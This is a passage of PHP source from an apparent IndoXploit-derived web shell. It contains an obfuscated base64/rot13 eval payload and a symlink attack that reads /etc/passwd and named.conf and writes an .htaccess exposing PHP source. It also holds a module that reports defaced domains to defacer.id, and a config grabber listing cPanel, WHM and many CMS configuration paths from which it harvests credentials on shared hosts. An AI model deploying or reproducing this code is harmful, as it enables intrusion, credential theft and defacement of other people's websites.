  670.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
  671. elseif($_GET['do'] == 'metu') {
  672.    
  673.  
  674. echo '<form action="?dir=$dir&do=metu" method="post">';
  675.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  676.     echo 'Byee !';
  677.    
  678. }
  679. elseif($_GET['do'] == 'about') {
  680.    
  681.     echo '<center>--00-- Shell<hr>IndoXploit Shell Recoded By --00--<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
  682.    
  683. }
  684. elseif($_GET['do'] == 'symlink') {
  685. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  686. $d0mains = @file("/etc/named.conf");
  687. ##httaces
  688. if($d0mains){
  689. @mkdir("cox_sym",0777);
  690. @chdir("cox_sym");
  691. @exe("ln -s / root");
  692. $file3 = 'Options Indexes FollowSymLinks
  693. DirectoryIndex --00--.htm
  694. AddType text/plain .php
  695. AddHandler text/plain .php
  696. Satisfy Any';
  697. $fp3 = fopen('.htaccess','w');
  698. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  699. echo "
  700. <table align=center border=1 style='width:60%;border-color:#333333;'>
  701. <tr>
  702. <td align=center><font size=2>S. No.</font></td>
  703. <td align=center><font size=2>Domains</font></td>
  704. <td align=center><font size=2>Users</font></td>
  705. <td align=center><font size=2>Symlink</font></td>
  706. </tr>";
  707. $dcount = 1;
  708. foreach($d0mains as $d0main){
  709. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  710. flush();
  711. if(strlen(trim($domains[1][0])) > 2){
  712. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  713. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  714. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  715. <td>".$user['name']."</td>
  716. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  717. flush();
  718. $dcount++;}}}
  719. echo "</table>";
  720. }else{
  721. $TEST=@file('/etc/passwd');
  722. if ($TEST){
  723. @mkdir("cox_sym",0777);
  724. @chdir("cox_sym");
  725. exe("ln -s / root");
  726. $file3 = 'Options Indexes FollowSymLinks
  727. DirectoryIndex --00--.htm
  728. AddType text/plain .php
  729. AddHandler text/plain .php
  730. Satisfy Any';
  731.  $fp3 = fopen('.htaccess','w');
  732.  $fw3 = fwrite($fp3,$file3);
  733.  @fclose($fp3);
  734.  echo "
  735. <table align=center border=1><tr>
  736. <td align=center><font size=3>S. No.</font></td>
  737. <td align=center><font size=3>Users</font></td>
  738. <td align=center><font size=3>Symlink</font></td></tr>";
  739.  $dcount = 1;
  740.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  741.  while(!feof($file)){
  742.  $s = fgets($file);
  743.  $matches = array();
  744.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  745.  $matches = str_replace("home/","",$matches[1]);
  746.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  747.  continue;
  748.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  749. <td align=center><font class=txt>" . $matches . "</td>";
  750.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  751.  $dcount++;}fclose($file);
  752.  echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
  753. Options Indexes FollowSymLinks
  754. DirectoryIndex --00--.htm
  755. AddType text/plain .php
  756. AddHandler text/plain .php
  757. Satisfy Any
  758. ';
  759.  $fp3 = fopen('.htaccess','w');
  760.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  761.  echo "
  762. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  763. <table align=center border=1><tr>
  764. <td align=center><font size=3>ID</font></td>
  765. <td align=center><font size=3>Users</font></td>
  766. <td align=center><font size=3>Symlink</font></td></tr>";
  767.  $temp = "";$val1 = 0;$val2 = 1000;
  768.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  769.  if ($uid)$temp .= join(':',$uid)."\n";}
  770.  echo '<br/>';$temp = trim($temp);$file5 =
  771.  fopen("test.txt","w");
  772.  fputs($file5,$temp);
  773.  fclose($file5);$dcount = 1;$file =
  774.  fopen("test.txt", "r") or exit("Unable to open file!");
  775.  while(!feof($file)){$s = fgets($file);$matches = array();
  776.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  777.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  778.  continue;
  779.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  780. <td align=center><font class=txt>" . $matches . "</td>";
  781.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  782.  $dcount++;}
  783.  fclose($file);
  784.  echo "</table></div></center>";unlink("test.txt");
  785.  } else
  786.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  787.  }
  788.  }    
  789. }
  790. elseif($_GET['do'] == 'defacerid') {
  791. echo "<center><form method='post'>
  792.         <u>Defacer</u>: <br>
  793.         <input type='text' name='hekel' size='50' value='--00--'><br>
  794.         <u>Team</u>: <br>
  795.         <input type='text' name='tim' size='50' value='Indonesian Code Party'><br>
  796.         <u>Domains</u>: <br>
  797.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  798.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  799.         </form>";
  800. $site = explode("\r\n", $_POST['sites']);
  801. $go = $_POST['go'];
  802. $hekel = $_POST['hekel'];
  803. $tim = $_POST['tim'];
  804. if($go) {
  805. foreach($site as $sites) {
  806. $zh = $sites;
  807. $form_url = "https://www.defacer.id/notify";
  808. $data_to_post = array();
  809. $data_to_post['attacker'] = "$hekel";
  810. $data_to_post['team'] = "$tim";
  811. $data_to_post['poc'] = 'SQL Injection';
  812. $data_to_post['url'] = "$zh";
  813. $curl = curl_init();
  814. curl_setopt($curl,CURLOPT_URL, $form_url);
  815. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  816. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  817. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  818. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  819. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  820. $result = curl_exec($curl);
  821. echo $result;
  822. curl_close($curl);
  823. echo "<br>";
  824. }
  825. }
  826. }
  827.  
  828. elseif($_GET['do'] == 'config') {
  829.     if($_POST){
  830.         $passwd = $_POST['passwd'];
  831.         mkdir("cox_config", 0777);
  832.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  833.         $htc = fopen("cox_config/.htaccess","w");
  834.         fwrite($htc, $isi_htc);
  835.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  836.         foreach($user_config[1] as $user_cox) {
  837.             $user_config_dir = "/home/$user_cox/public_html/";
  838.             if(is_readable($user_config_dir)) {
  839.                 $grab_config = array(
  840.                                         "/home/$user_cox/.my.cnf" => "cpanel",
  841.                     "/home/$user_cox/.accesshash" => "WHM-accesshash",
  842.                     "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  843.                     "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  844.                     "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  845.                     "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",             
  846.                     "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  847.                     "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  848.                     "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  849.                     "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  850.                     "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  851.                     "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  852.                     "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
  853.                     "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",                   
  854.                     "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  855.                     "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  856.                     "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
  857.                     "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  858.                     "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  859.                     "/home/$user_cox/public_html/submitticket.php" => "WHMCS",                                     
  860.                     "/home/$user_cox/public_html/configuration.php" => "Joomla",                   
  861.                     "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  862.                     "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  863.                     "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
  864.                     "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  865.                     "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  866.                     "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  867.                     "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  868.                     "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  869.                     "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  870.                     "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  871.                     "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  872.                     "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  873.                     "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  874.                     "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  875.                     "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  876.                     "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  877.                     "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  878.                     "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  879.                     "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  880.                     "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  881.                     "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  882.                     "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  883.                     "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  884.                     "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  885.                     "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  886.                     "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  887.                     "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  888.                     "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  889.                     "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  890.                     "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  891.                     "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  892.                     "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  893.                     "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  894.                     "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  895.                     "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  896.                     "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                  
  897.                     "/home/$user_cox/public_html/wp-config.php" => "WordPress",
  898.                     "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  899.                     "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  900.                     "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",     
  901.                     "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  902.                     "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  903.                     "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  904.                     "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  905.                     "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  906.                     "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  907.                     "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  908.                     "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  909.                     "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  910.                     "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  911.                     "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  912.                     "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  913.                     "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  914.                     "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  915.                     "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  916.                     "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  917.                     "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  918.                     "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  919.                     "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  920.                     "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  921.                     "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  922.                     "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  923.                     "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  924.                     "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  925.                     "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  926.                     "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  927.                     "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  928.                     "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  929.                     "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  930.                     "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  931.                     "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  932.                     "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  933.                     "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  934.                                         "/home1/$user_cox/.my.cnf" => "cpanel",
  935.                     "/home1/$user_cox/.accesshash" => "WHM-accesshash",
  936.                     "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  937.                     "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  938.                     "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  939.                     "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  940.                     "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  941.                     "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
  942.                     "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  943.                     "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  944.                     "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
  945.                     "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
  946.                     "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
  947.                     "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  948.                     "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  949.                     "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  950.                     "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
  951.                     "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  952.                     "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  953.                     "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  954.                     "/home1/$user_cox/public_html/configuration.php" => "Joomla",                  
  955.                     "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  956.                     "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  957.                     "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  958.                     "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  959.                     "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  960.                     "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  961.                     "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  962.                     "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  963.                     "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  964.                     "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  965.                     "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  966.                     "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  967.                     "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  968.                     "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  969.                     "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  970.                     "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  971.                     "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  972.                     "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  973.                     "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  974.                     "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  975.                     "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  976.                     "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  977.                     "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  978.                     "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  979.                     "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  980.                     "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  981.                     "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  982.                     "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  983.                     "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  984.                     "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  985.                     "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  986.                     "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  987.                     "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  988.                     "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  989.                     "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  990.                     "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  991.                     "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
  992.                     "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  993.                     "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  994.                     "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  995.                     "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  996.                     "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  997.                     "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  998.                     "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  999.                     "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1000.                     "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1001.                     "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1002.                     "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1003.                     "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1004.                     "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1005.                     "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1006.                     "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1007.                     "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1008.                     "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1009.                     "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1010.                     "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1011.                     "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1012.                     "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1013.                     "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1014.                     "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1015.                     "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1016.                     "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1017.                     "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1018.                     "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1019.                     "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1020.                     "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1021.                     "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1022.                     "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1023.                     "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1024.                     "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1025.                     "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1026.                     "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1027.                     "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  1028.                                         "/home2/$user_cox/.my.cnf" => "cpanel",
  1029.                     "/home2/$user_cox/.accesshash" => "WHM-accesshash",
  1030.                     "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  1031.                     "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1032.                     "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1033.                     "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  1034.                     "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  1035.                     "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
  1036.                     "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1037.                     "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  1038.                     "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1039.                     "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
  1040.                     "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
  1041.                     "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  1042.                     "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  1043.                     "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  1044.                     "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
  1045.                     "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  1046.                     "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  1047.                     "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  1048.                     "/home2/$user_cox/public_html/configuration.php" => "Joomla",                  
  1049.                     "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  1050.                     "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  1051.                     "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  1052.                     "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  1053.                     "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  1054.                     "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  1055.                     "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  1056.                     "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  1057.                     "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  1058.                     "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  1059.                     "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  1060.                     "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  1061.                     "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  1062.                     "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  1063.                     "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  1064.                     "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  1065.                     "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  1066.                     "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  1067.                     "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  1068.                     "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  1069.                     "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  1070.                     "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  1071.                     "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  1072.                     "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  1073.                     "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  1074.                     "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  1075.                     "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
